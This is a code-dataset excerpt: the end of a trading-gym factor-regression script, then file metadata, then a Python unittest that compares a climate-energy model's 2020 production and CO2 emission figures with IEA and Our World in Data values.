from trading_gym.envs.portfolio_gym.portfolio_gym import PortfolioTradingGym
order_book_id_number = 100
toy_data = create_toy_data(order_book_ids_number=order_book_id_number, feature_number=10, start="2019-05-01", end="2019-12-12", frequency="D")
env = PortfolioTradingGym(data_df=toy_data, sequence_window=1, add_cash=False)
state = env.reset()
while True:
next_state, reward, done, info = env.step(action=None)
label = info["one_step_fwd_returns"]
print(state)
print(label)
#
regressor = LinearRegression()
regressor.fit(state.values, label.values)
#display and store
print(regressor.coef_)
env.experience_buffer["coef"].append(regressor.coef_)
#
if done:
break
else:
state = next_state
#
factor_returns = pd.DataFrame(np.array(env.experience_buffer["coef"]), index=env.experience_buffer["dt"], columns=toy_data.columns[:-1])
cum_factor_returns = (factor_returns +1).cumprod()
cum_factor_returns.plot(title="Cumulative Factor Return",linewidth=2.2)
| 30.9
| 142
| 0.741909
| 176
| 1,236
| 4.977273
| 0.534091
| 0.039954
| 0.065068
| 0.038813
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02639
| 0.141586
| 1,236
| 39
| 143
| 31.692308
| 0.799246
| 0.048544
| 0
| 0
| 0
| 0
| 0.064157
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.230769
| 0
| 0.230769
| 0.115385
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3968419bade051f1706f219d6c57e614a8cbfb88
| 49,588
|
py
|
Python
|
climateeconomics/tests/_l1_test_energy_global_values.py
|
os-climate/witness-core
|
3ef9a44d86804c5ad57deec3c9916348cb3bfbb8
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | 1
|
2022-01-14T06:37:42.000Z
|
2022-01-14T06:37:42.000Z
|
climateeconomics/tests/_l1_test_energy_global_values.py
|
os-climate/witness-core
|
3ef9a44d86804c5ad57deec3c9916348cb3bfbb8
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
climateeconomics/tests/_l1_test_energy_global_values.py
|
os-climate/witness-core
|
3ef9a44d86804c5ad57deec3c9916348cb3bfbb8
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
'''
mode: python; py-indent-offset: 4; tab-width: 4; coding: utf-8
Copyright (C) 2020 Airbus SAS
'''
import unittest
import time
import numpy as np
import pandas as pd
from sos_trades_core.execution_engine.execution_engine import ExecutionEngine
from climateeconomics.sos_processes.iam.witness.witness_dev.usecase_witness import Study as Study_open
class TestGlobalEnergyValues(unittest.TestCase):
"""
This test class has the objective to test order of magnitude of some key values in energy models in 2020
All the data are taken either from ourworldindata:
Hannah Ritchie, Max Roser and Pablo Rosado (2020) - "Energy". Published online at OurWorldInData.org.
Retrieved from: 'https://ourworldindata.org/energy' [Online Resource]
Or from IEA:
Source: IEA 2022, Data Tables, https://www.iea.org/data-and-statistics/data-tables?country=WORLD&energy=Balances&year=2019,
License: CC BY 4.0.
"""
def setUp(self):
'''
Initialize third data needed for testing
'''
self.dirs_to_del = []
self.namespace = 'MyCase'
self.study_name = f'{self.namespace}'
self.name = 'Test'
self.energymixname = 'EnergyMix'
self.ee = ExecutionEngine(self.name)
repo = 'climateeconomics.sos_processes.iam.witness'
builder = self.ee.factory.get_builder_from_process(
repo, 'witness_dev')
self.ee.factory.set_builders_to_coupling_builder(builder)
self.ee.configure()
usecase = Study_open(execution_engine=self.ee)
usecase.study_name = self.name
values_dict = usecase.setup_usecase()
self.ee.display_treeview_nodes()
full_values_dict = {}
for dict_v in values_dict:
full_values_dict.update(dict_v)
self.ee.load_study_from_input_dict(full_values_dict)
# def test_01_check_global_production_values(self):
# '''
# Test order of magnitude of raw energy production with values from ourworldindata
# https://ourworldindata.org/energy-mix?country=
#
# '''
# self.ee.execute()
#
# # These emissions are in Gt
# energy_production = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.energy_production_brut_detailed')
#
# '''
# Theory in 2019 from ourwolrdindata expressed in TWh (2020 is a covid year)
# we need to substract energy own use to get same hypthesis than our models (enrgy own_use is substracted from raw production
# '''
# oil_product_production = 49472. - 2485.89
# wind_production = 1590.19 # in 2020
# nuclear_production = 2616.61
# hydropower_production = 4355.
# trad_biomass_production = 13222.
# other_renew_production = 1614.
# modern_biofuels_production = 1043. # in 2020
# # in 2020
# # https://ourworldindata.org/renewable-energy#solar-energy-generation
# solar_production = 844.37
# coal_production = 43752. - 952.78
# gas_production = 39893. - 3782.83
# total_production = 171240.
#
# '''
# Oil production
# '''
#
# computed_oil_production = energy_production['production fuel.liquid_fuel (TWh)'].loc[
# energy_production['years'] == 2020].values[0]
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_oil_production,
# oil_product_production * 1.1)
# self.assertGreaterEqual(
# computed_oil_production, oil_product_production * 0.9)
#
# '''
# Gas production
# '''
# fossil_gas_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.methane.FossilGas.techno_production')
# computed_gas_production = fossil_gas_prod['methane (TWh)'].loc[
# fossil_gas_prod['years'] == 2020].values[0] * 1000.0
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_gas_production,
# gas_production * 1.1)
# self.assertGreaterEqual(
# computed_gas_production, gas_production * 0.9)
#
# '''
# Coal production
# '''
# coal_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.solid_fuel.CoalExtraction.techno_production')
# computed_coal_production = coal_prod['solid_fuel (TWh)'].loc[
# coal_prod['years'] == 2020].values[0] * 1000.0
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_coal_production,
# coal_production * 1.1)
# self.assertGreaterEqual(
# computed_coal_production, coal_production * 0.9)
#
# '''
# Biomass production , the value is traditional biomass consumption , but we know that we do not consume all the biomass that we can produce
# Waiting for a specific value to compare
# '''
# #
# computed_biomass_production = energy_production['production biomass_dry (TWh)'].loc[
# energy_production['years'] == 2020].values[0]
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_biomass_production,
# trad_biomass_production * 1.1)
# self.assertGreaterEqual(
# computed_biomass_production, trad_biomass_production * 0.9)
#
# '''
# Biofuel production
# '''
#
# computed_biodiesel_production = energy_production['production fuel.biodiesel (TWh)'].loc[
# energy_production['years'] == 2020].values[0]
#
# computed_biogas_production = energy_production['production biogas (TWh)'].loc[
# energy_production['years'] == 2020].values[0]
#
# computed_biofuel_production = computed_biodiesel_production + \
# computed_biogas_production
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_biofuel_production,
# modern_biofuels_production * 1.1)
# # we compare in TWh and must be near 30% of error because some biofuels
# # are missing
# self.assertGreaterEqual(
# computed_biofuel_production, modern_biofuels_production * 0.7)
#
# '''
# Solar production
# '''
# elec_solar_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.electricity.SolarPv.techno_production')
#
# elec_solarth_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.electricity.SolarThermal.techno_production')
#
# computed_solar_production = elec_solar_prod['electricity (TWh)'].loc[
# elec_solar_prod['years'] == 2020].values[0] * 1000.0 + \
# elec_solarth_prod['electricity (TWh)'].loc[
# elec_solarth_prod['years'] == 2020].values[0] * 1000.0
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_solar_production,
# solar_production * 1.1)
# self.assertGreaterEqual(
# computed_solar_production, solar_production * 0.9)
#
# '''
# Wind production
# '''
# elec_windonshore_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.electricity.WindOnshore.techno_production')
# elec_windoffshore_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.electricity.WindOffshore.techno_production')
#
# computed_wind_production = elec_windonshore_prod['electricity (TWh)'].loc[
# elec_windonshore_prod['years'] == 2020].values[0] * 1000.0 + \
# elec_windoffshore_prod['electricity (TWh)'].loc[
# elec_windoffshore_prod['years'] == 2020].values[0] * 1000.0
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_wind_production,
# wind_production * 1.1)
# self.assertGreaterEqual(
# computed_wind_production, wind_production * 0.9)
#
# '''
# Nuclear production
# '''
# elec_nuclear_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.electricity.Nuclear.techno_production')
#
# computed_nuclear_production = elec_nuclear_prod['electricity (TWh)'].loc[
# elec_nuclear_prod['years'] == 2020].values[0] * 1000.0
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_nuclear_production,
# nuclear_production * 1.1)
# self.assertGreaterEqual(
# computed_nuclear_production, nuclear_production * 0.9)
#
# '''
# Hydropower production
# '''
# elec_hydropower_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.electricity.Hydropower.techno_production')
#
# computed_hydropower_production = elec_hydropower_prod['electricity (TWh)'].loc[
# elec_hydropower_prod['years'] == 2020].values[0] * 1000
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_hydropower_production,
# hydropower_production * 1.1)
# self.assertGreaterEqual(
# computed_hydropower_production, hydropower_production * 0.9)
def test_02_check_global_co2_emissions_values(self):
'''
Test order of magnitude of co2 emissions with values from ourworldindata
https://ourworldindata.org/emissions-by-fuel
'''
self.ee.execute()
# These emissions are in Gt
co2_emissions_by_energy = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.co2_emissions_by_energy')
'''
Theory in 2020 from ourwolrdindata expressed in Mt
'''
oil_co2_emissions = 11.07e3 # expressed in Mt
coal_co2_emissions = 13.97e3 # expressed in Mt
gas_co2_emissions = 7.4e3 # expressed in Mt
total_co2_emissions = 34.81e3 # billions tonnes
'''
Methane CO2 emissions are emissions from methane energy + gasturbine from electricity
'''
elec_gt_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.GasTurbine.techno_detailed_production')
elec_cgt_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.CombinedCycleGasTurbine.techno_detailed_production')
wgs_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.hydrogen.gaseous_hydrogen.WaterGasShift.techno_detailed_production')
computed_methane_co2_emissions = co2_emissions_by_energy['methane'].loc[co2_emissions_by_energy['years'] == 2020].values[0] + \
elec_gt_prod['CO2 from Flue Gas (Mt)'].loc[elec_gt_prod['years']
== 2020].values[0] +\
elec_cgt_prod['CO2 from Flue Gas (Mt)'].loc[elec_gt_prod['years']
== 2020].values[0] +\
wgs_prod['CO2 from Flue Gas (Mt)'].loc[wgs_prod['years']
== 2020].values[0] * 0.75
# we compare in Mt and must be near 10% of error
self.assertLessEqual(computed_methane_co2_emissions,
gas_co2_emissions * 1.1)
self.assertGreaterEqual(
computed_methane_co2_emissions, gas_co2_emissions * 0.9)
print(
f'Methane CO2 emissions : ourworldindata {gas_co2_emissions} Mt vs WITNESS {computed_methane_co2_emissions} TWh')
'''
Coal CO2 emissions are emissions from coal energy + CoalGeneration from electricity + SMR +
'''
elec_coal_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.CoalGen.techno_detailed_production')
computed_coal_co2_emissions = co2_emissions_by_energy['solid_fuel'].loc[co2_emissions_by_energy['years'] == 2020].values[0] + \
elec_coal_prod['CO2 from Flue Gas (Mt)'].loc[elec_coal_prod['years']
== 2020].values[0] +\
wgs_prod['CO2 from Flue Gas (Mt)'].loc[wgs_prod['years']
== 2020].values[0] * 0.25
# we compare in Mt and must be near 10% of error
self.assertLessEqual(computed_coal_co2_emissions,
coal_co2_emissions * 1.1)
self.assertGreaterEqual(
computed_coal_co2_emissions, coal_co2_emissions * 0.9)
print(
f'Coal CO2 emissions : ourworldindata {coal_co2_emissions} Mt vs WITNESS {computed_coal_co2_emissions} TWh')
'''
Oil CO2 emissions are emissions from oil energy
'''
computed_oil_co2_emissions = co2_emissions_by_energy['fuel.liquid_fuel'].loc[
co2_emissions_by_energy['years'] == 2020].values[0]
# we compare in Mt and must be near 10% of error
self.assertLessEqual(computed_oil_co2_emissions,
oil_co2_emissions * 1.1)
self.assertGreaterEqual(
computed_oil_co2_emissions, oil_co2_emissions * 0.9)
print(
f'Oil CO2 emissions : ourworldindata {oil_co2_emissions} Mt vs WITNESS {computed_oil_co2_emissions} TWh')
'''
Total CO2 emissions are emissions from oil energy
'''
sources = self.ee.dm.get_value(
'Test.CCUS.CO2_emissions_by_use_sources')
sinks = self.ee.dm.get_value('Test.CCUS.CO2_emissions_by_use_sinks')[
'CO2_resource removed by energy mix (Gt)'].values[0]
sources_sum = sources.loc[sources['years'] == 2020][[
col for col in sources.columns if col != 'years']].sum(axis=1)[0]
computed_total_co2_emissions = (sources_sum - sinks) * 1000
# we compare in Mt and must be near 10% of error
print(
f'Total CO2 emissions : ourworldindata {total_co2_emissions} Mt vs WITNESS {computed_total_co2_emissions} TWh')
self.assertLessEqual(computed_total_co2_emissions,
total_co2_emissions * 1.1)
self.assertGreaterEqual(
computed_total_co2_emissions, total_co2_emissions * 0.9)
def test_03_check_net_production_values(self):
'''
Test order of magnitude of net energy production with values from Energy Balances IEA 2019:
Source: IEA 2022, Data Tables, https://www.iea.org/data-and-statistics/data-tables?country=WORLD&energy=Balances&year=2019,
License: CC BY 4.0.
'''
self.ee.execute()
# These emissions are in Gt
net_energy_production = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.energy_production_detailed')
energy_production = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.energy_production_brut_detailed')
'''
Theory in 2019 from Energy Balances IEA 2019 expressed in TWh
'''
'''
Coal balances
'''
print('---------- Coal balances -------------')
coal_energy_own_use = 952.78
print(
f'Energy own use for coal production is {coal_energy_own_use} TWh and now taken into account into raw production')
energy_production_raw_coal_iea = 46666 - coal_energy_own_use # TWH
coal_raw_prod = energy_production['production solid_fuel (TWh)'][0]
error_coalraw_prod = np.abs(
energy_production_raw_coal_iea - coal_raw_prod) / energy_production_raw_coal_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_coalnet_prod,
# 10.0)
print('coal raw production error : ', error_coalraw_prod, ' %',
f'IEA :{energy_production_raw_coal_iea} TWh vs WITNESS :{coal_raw_prod} TWh')
# elec plants needs
elec_plants = self.ee.dm.get_value(f'{self.name}.{self.energymixname}.electricity.energy_consumption')[
'solid_fuel (TWh)'][0] * 1000.0
elec_plants_coal_IEA = 20194.44 # TWh
error_elec_plants = np.abs(
elec_plants_coal_IEA - elec_plants) / elec_plants_coal_IEA * 100.0
# we compare in TWh and must be near 10% of error
self.assertLessEqual(error_elec_plants,
10.0)
print('coal used by electricity plants error : ', error_elec_plants, ' %',
f'IEA :{elec_plants_coal_IEA} TWh vs WITNESS :{elec_plants} TWh')
# syngas plants needs
syngas_plants = self.ee.dm.get_value(f'{self.name}.{self.energymixname}.syngas.energy_consumption')[
'solid_fuel (TWh)'][0] * 1000.0
liquefaction_plants_coal_IEA = 264.72 # TWh
error_syngas_plants = np.abs(
liquefaction_plants_coal_IEA - syngas_plants) / liquefaction_plants_coal_IEA * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_syngas_plants,
# 10.0)
print('coal used by syngas plants error : ', error_syngas_plants, ' %',
f'IEA :{liquefaction_plants_coal_IEA} TWh vs WITNESS :{syngas_plants} TWh')
coal_used_by_energy = energy_production[
'production solid_fuel (TWh)'][0] - net_energy_production[
'production solid_fuel (TWh)'][0]
# chp plants and heat plantstechnology not implemented
chp_plants = 8222.22 + 289 # TWh
print('CHP and heat plants not implemented corresponds to ',
chp_plants / coal_used_by_energy * 100.0, ' % of coal used by energy : ', chp_plants, ' TWh')
# coal to gas technology not implemented
gas_works = 196.11 # Twh
coal_total_final_consumption = net_energy_production[
'production solid_fuel (TWh)'][0]
print('Coal to gas plants not implemented corresponds to ',
gas_works / coal_used_by_energy * 100.0, ' % of coal used by energy')
coal_total_final_consumption = net_energy_production[
'production solid_fuel (TWh)'][0]
coal_total_final_consumption_iea = 11055 # TWH
error_coalnet_prod = np.abs(
coal_total_final_consumption_iea - coal_total_final_consumption) / coal_total_final_consumption_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_coalnet_prod,
# 10.0)
print('coal net production error : ', error_coalnet_prod, ' %',
f'IEA :{coal_total_final_consumption_iea} TWh vs WITNESS :{coal_total_final_consumption} TWh')
print('CHP and heat plants not taken into account for coal consumption explains the differences')
'''
Gas balances
'''
print('---------- Gas balances -------------')
energy_own_use = 3732.83
print('Energy industry own use covers the amount of fuels used by the energy producing industries (e.g. for heating, lighting and operation of all equipment used in the extraction process, for traction and for distribution)')
print(
f'Energy own use for methane production is {energy_own_use} TWh and now taken into account into raw production')
energy_production_raw_gas_iea = 40000 - energy_own_use # TWH
gas_raw_prod = energy_production['production methane (TWh)'][0]
error_gasraw_prod = np.abs(
energy_production_raw_gas_iea - gas_raw_prod) / energy_production_raw_gas_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_coalnet_prod,
# 10.0)
print('gas raw production error : ', error_gasraw_prod, ' %',
f'IEA :{energy_production_raw_gas_iea} TWh vs WITNESS :{gas_raw_prod} TWh')
# elec plants needs
elec_plants = self.ee.dm.get_value(f'{self.name}.{self.energymixname}.electricity.energy_consumption')[
'methane (TWh)'][0] * 1000.0
elec_plants_gas_IEA = 10833.33 # TWh
chp_plants_iea = 3887.05 + 709 # TWh
error_elec_plants = np.abs(
elec_plants_gas_IEA - elec_plants) / elec_plants_gas_IEA * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_elec_plants,
# 10.0)
print('gas used by electricity plants error : ',
error_elec_plants, ' %',
f'IEA :{elec_plants_gas_IEA } TWh vs WITNESS :{elec_plants} TWh')
methane_used_by_energy = energy_production[
'production methane (TWh)'][0] - net_energy_production[
'production methane (TWh)'][0]
print('CHP and heat plants not implemented corresponds to ',
chp_plants_iea / methane_used_by_energy * 100.0, ' % of methane used by energy : ', chp_plants_iea, ' TWh')
# syngas plants needs
syngas_plants = self.ee.dm.get_value(f'{self.name}.{self.energymixname}.syngas.energy_consumption')[
'methane (TWh)'][0] * 1000.0
liquefaction_plants_methane_IEA = 202.74 # TWh
other_transformation = 277.5 # TWH
# other transformaton includes the transformation of natural gas for
# hydrogen manufacture
error_syngas_plants = np.abs(
liquefaction_plants_methane_IEA + other_transformation - syngas_plants) / liquefaction_plants_methane_IEA * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_syngas_plants,
# 10.0)
print('methane used by syngas plants error : ',
error_syngas_plants, ' %',
f'IEA :{liquefaction_plants_methane_IEA + other_transformation} TWh vs WITNESS :{syngas_plants} TWh')
methane_total_final_consumption = net_energy_production[
'production methane (TWh)'][0]
methane_total_final_consumption_iea = 19001 # TWH
error_methanenet_prod = np.abs(
methane_total_final_consumption_iea - methane_total_final_consumption) / methane_total_final_consumption_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_coalnet_prod,
# 10.0)
print('methane net production error : ', error_methanenet_prod, ' %',
f'IEA :{methane_total_final_consumption_iea} TWh vs WITNESS :{methane_total_final_consumption} TWh')
print('CHP and heat plants not taken into account for methane consumption explains some differences')
'''
Electricity balances
'''
print('---------- Electricity balances -------------')
net_elec_prod = net_energy_production[
'production electricity (TWh)'][0]
net_elec_prod_iea = 22847.66 # TWh
error_net_elec_prod = np.abs(
net_elec_prod_iea - net_elec_prod) / net_elec_prod_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_coalnet_prod,
# 10.0)
print('Net electricity production error : ', error_net_elec_prod, ' %',
f'IEA :{net_elec_prod_iea} TWh vs WITNESS :{net_elec_prod} TWh')
energy_production_raw_hydro_iea = 4222.22 # TWH
elec_hydropower_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.Hydropower.techno_production')
computed_hydropower_production = elec_hydropower_prod['electricity (TWh)'].loc[
elec_hydropower_prod['years'] == 2020].values[0] * 1000
error_hydropowerraw_prod = np.abs(
energy_production_raw_hydro_iea - computed_hydropower_production) / energy_production_raw_hydro_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_coalnet_prod,
# 10.0)
print('hydropower raw production error : ', error_hydropowerraw_prod, ' %',
f'IEA :{energy_production_raw_hydro_iea} TWh vs WITNESS :{computed_hydropower_production} TWh')
energy_production_raw_wind_iea = 1427.41 # TWH
elec_windonshore_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.WindOnshore.techno_production')
elec_windoffshore_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.WindOffshore.techno_production')
computed_wind_production = elec_windonshore_prod['electricity (TWh)'].loc[
elec_windonshore_prod['years'] == 2020].values[0] * 1000.0 + \
elec_windoffshore_prod['electricity (TWh)'].loc[
elec_windoffshore_prod['years'] == 2020].values[0] * 1000.0
error_wind_prod = np.abs(
energy_production_raw_wind_iea - computed_wind_production) / energy_production_raw_wind_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_wind_prod,
# 10.0)
print('Wind raw production error : ', error_wind_prod, ' %',
f'IEA :{energy_production_raw_wind_iea} TWh vs WITNESS :{computed_wind_production} TWh')
elec_solar_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.SolarPv.techno_production')
computed_solarpv_production = elec_solar_prod['electricity (TWh)'].loc[
elec_solar_prod['years'] == 2020].values[0] * 1000
energy_production_solarpv_iea = 680.9 # TWh
error_solarpv_prod = np.abs(
energy_production_solarpv_iea - computed_solarpv_production) / energy_production_solarpv_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_solarpv_prod,
# 10.0)
print('Solar PV raw production error : ', error_solarpv_prod, ' %',
f'IEA :{energy_production_solarpv_iea} TWh vs WITNESS :{computed_solarpv_production} TWh')
elec_solarth_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.SolarThermal.techno_production')
computed_solarth_production = elec_solarth_prod['electricity (TWh)'].loc[
elec_solarth_prod['years'] == 2020].values[0] * 1000
energy_production_solarth_iea = 13.36 # TWh
error_solarth_prod = np.abs(
energy_production_solarth_iea - computed_solarth_production) / energy_production_solarth_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_solarpv_prod,
# 10.0)
print('Solar Thermal raw production error : ', error_solarth_prod, ' %',
f'IEA :{energy_production_solarth_iea} TWh vs WITNESS :{computed_solarth_production} TWh')
elec_geoth_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.Geothermal.techno_production')
computed_geoth_production = elec_geoth_prod['electricity (TWh)'].loc[
elec_geoth_prod['years'] == 2020].values[0] * 1000.0
energy_production_geoth_iea = 91.09 # TWh
error_geoth_prod = np.abs(
energy_production_geoth_iea - computed_geoth_production) / energy_production_geoth_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_solarpv_prod,
# 10.0)
print('Geothermal raw production error : ', error_geoth_prod, ' %',
f'IEA :{energy_production_geoth_iea} TWh vs WITNESS :{computed_geoth_production} TWh')
elec_coalgen_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.CoalGen.techno_production')
computed_coalgen_production = elec_coalgen_prod['electricity (TWh)'].loc[
elec_coalgen_prod['years'] == 2020].values[0] * 1000.0
energy_production_coalgen_iea = 9914.45 # TWh
error_geoth_prod = np.abs(
energy_production_coalgen_iea - computed_coalgen_production) / energy_production_coalgen_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_solarpv_prod,
# 10.0)
print('Coal generation raw production error : ', error_geoth_prod, ' %',
f'IEA :{energy_production_coalgen_iea} TWh vs WITNESS :{computed_coalgen_production} TWh')
elec_oilgen_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.OilGen.techno_production')
computed_oilgen_production = elec_oilgen_prod['electricity (TWh)'].loc[
elec_oilgen_prod['years'] == 2020].values[0] * 1000.0
energy_production_oilgen_iea = 747 # TWh
error_oil_prod = np.abs(
energy_production_oilgen_iea - computed_oilgen_production) / energy_production_oilgen_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_solarpv_prod,
# 10.0)
print('Oil generation raw production error : ', error_oil_prod, ' %',
f'IEA :{energy_production_oilgen_iea} TWh vs WITNESS :{computed_oilgen_production} TWh')
elec_gt_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.GasTurbine.techno_production')
elec_cgt_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.CombinedCycleGasTurbine.techno_production')
computed_gasgen_production = elec_gt_prod['electricity (TWh)'].loc[
elec_gt_prod['years'] == 2020].values[0] * 1000.0 + elec_cgt_prod['electricity (TWh)'].loc[
elec_cgt_prod['years'] == 2020].values[0] * 1000.0
energy_production_gasgen_iea = 6346 # TWh
error_gasgen_prod = np.abs(
energy_production_gasgen_iea - computed_gasgen_production) / energy_production_gasgen_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_solarpv_prod,
# 10.0)
print('Gas generation raw production error : ', error_gasgen_prod, ' %',
f'IEA :{energy_production_gasgen_iea} TWh vs WITNESS :{computed_gasgen_production} TWh')
elec_nuclear_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.Nuclear.techno_production')
computed_nuclear_production = elec_nuclear_prod['electricity (TWh)'].loc[
elec_nuclear_prod['years'] == 2020].values[0] * 1000.0
energy_production_nuclear_iea = 2789.69 # TWh
error_geoth_prod = np.abs(
energy_production_nuclear_iea - computed_nuclear_production) / energy_production_nuclear_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_solarpv_prod,
# 10.0)
print('Nuclear raw production error : ', error_geoth_prod, ' %',
f'IEA :{energy_production_nuclear_iea} TWh vs WITNESS :{computed_nuclear_production} TWh')
energy_production_oilgen_iea = 747 # TWh
energy_production_biofuelgen_iea = 542.56 # TWh
print(
f'Technologies of electricity generation with oil ({energy_production_oilgen_iea} TWh) and biofuel ({energy_production_biofuelgen_iea} TWh) are not yet implemented')
'''
Biofuels and waste balances
'''
print('---------- Biomass dry balances -------------')
print('We consider biomass_dry equals to the sum of primary solid biofuels (no municipal/industiral waste) but in the doc they do not consider crop residues')
biomass_dry_raw_prod_iea = (
48309940) / 3600 # TWh 1414648 + 1142420 +
biomass_dry_net_prod_iea = (36537355) / 3600 # TWh + 150882 + 519300
# managed_wood_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.biomass_dry.ManagedWood.techno_production')
#
# computed_managed_wood_prod = managed_wood_prod['biomass_dry (TWh)'].loc[
# managed_wood_prod['years'] == 2020].values[0] * 1000.0
#
# unmanaged_wood_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.biomass_dry.UnmanagedWood.techno_production')
#
# computed_unmanaged_wood_prod = unmanaged_wood_prod['biomass_dry (TWh)'].loc[
# unmanaged_wood_prod['years'] == 2020].values[0] * 1000.0
#
# crop_energy_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.biomass_dry.CropEnergy.techno_production')
#
# computed_crop_energy_prod = crop_energy_prod['biomass_dry (TWh)'].loc[
# crop_energy_prod['years'] == 2020].values[0] * 1000.0
#
biomass_dry_net_prod = net_energy_production[
'production biomass_dry (TWh)'][0] # - computed_crop_energy_prod
#
biomass_dry_raw_prod = energy_production[
'production biomass_dry (TWh)'][0]
error_biomassdry_raw_prod = np.abs(
biomass_dry_raw_prod_iea - biomass_dry_raw_prod) / biomass_dry_raw_prod_iea * 100.0
print('Biomass dry raw production error : ', error_biomassdry_raw_prod, ' %',
f'IEA :{biomass_dry_raw_prod_iea} TWh vs WITNESS :{biomass_dry_raw_prod} TWh')
error_biomassdry_net_prod = np.abs(
biomass_dry_net_prod_iea - biomass_dry_net_prod) / biomass_dry_net_prod_iea * 100.0
print('Biomass dry net production error : ', error_biomassdry_net_prod, ' %',
f'IEA :{biomass_dry_net_prod_iea} TWh vs WITNESS :{biomass_dry_net_prod} TWh')
#
# biomass_dry_elec_plants = 3650996 / 3600 # TWh
# biomass_dry_chp_plants = (2226110 + 324143) / 3600 # TWh
# biomass_dry_otherrtransf = 5220384 / 3600 # TWh
#
# print('CHP and heat plants using biomass are not implemented corresponds to ',
# biomass_dry_chp_plants / biomass_dry_raw_prod_iea * 100.0, ' % of biomass raw production : ', biomass_dry_chp_plants, ' TWh')
# print('Electricity plants using biomass are not implemented corresponds to ',
# biomass_dry_elec_plants / biomass_dry_raw_prod_iea * 100.0, ' % of biomass raw production : ', biomass_dry_elec_plants, ' TWh')
#
# biogas_cons = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.biogas.energy_consumption')
#
# biomass_by_biogas_cons = biogas_cons['wet_biomass (Mt)'].loc[
# biogas_cons['years'] == 2020].values[0] * 1000 * 3.6 # 3.6 is calorific value of biomass_dry
#
# syngas_cons = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.solid_fuel.energy_consumption')
#
# biomass_by_syngas_cons = syngas_cons['biomass_dry (TWh)'].loc[
# syngas_cons['years'] == 2020].values[0] * 1000
#
# solid_fuel_cons = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.solid_fuel.energy_consumption')
#
# biomass_by_solid_fuel_cons = solid_fuel_cons['biomass_dry (TWh)'].loc[
# solid_fuel_cons['years'] == 2020].values[0] * 1000
#
# biomass_dry_otherrtransf_witness = biomass_by_solid_fuel_cons + biomass_by_syngas_cons
# biomass_dry_otherrtransf_with_ana = biomass_by_biogas_cons + \
